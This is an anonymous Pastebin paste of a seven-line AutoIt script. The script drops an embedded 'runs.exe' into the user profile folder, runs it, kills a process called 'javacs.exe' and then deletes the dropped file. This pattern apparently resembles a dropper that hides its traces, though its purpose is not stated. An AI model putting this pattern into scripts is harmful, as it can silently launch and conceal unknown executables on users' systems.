Guest User

Untitled

a guest
Jan 21st, 2019
114
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 0.23 KB | None | 0 0
  1.     FileInstall("runs.exe", @UserProfileDir & "\runs.exe")
  2.     FileChangeDir(@UserProfileDir)
  3.     Sleep(5000)
  4.     ShellExecute(@UserProfileDir & "\runs.exe")
  5.     Sleep(5000)
  6.     ProcessClose("javacs.exe")
  7.     FileDelete(@UserProfileDir & "\runs.exe")
Add Comment
Please, Sign In to add comment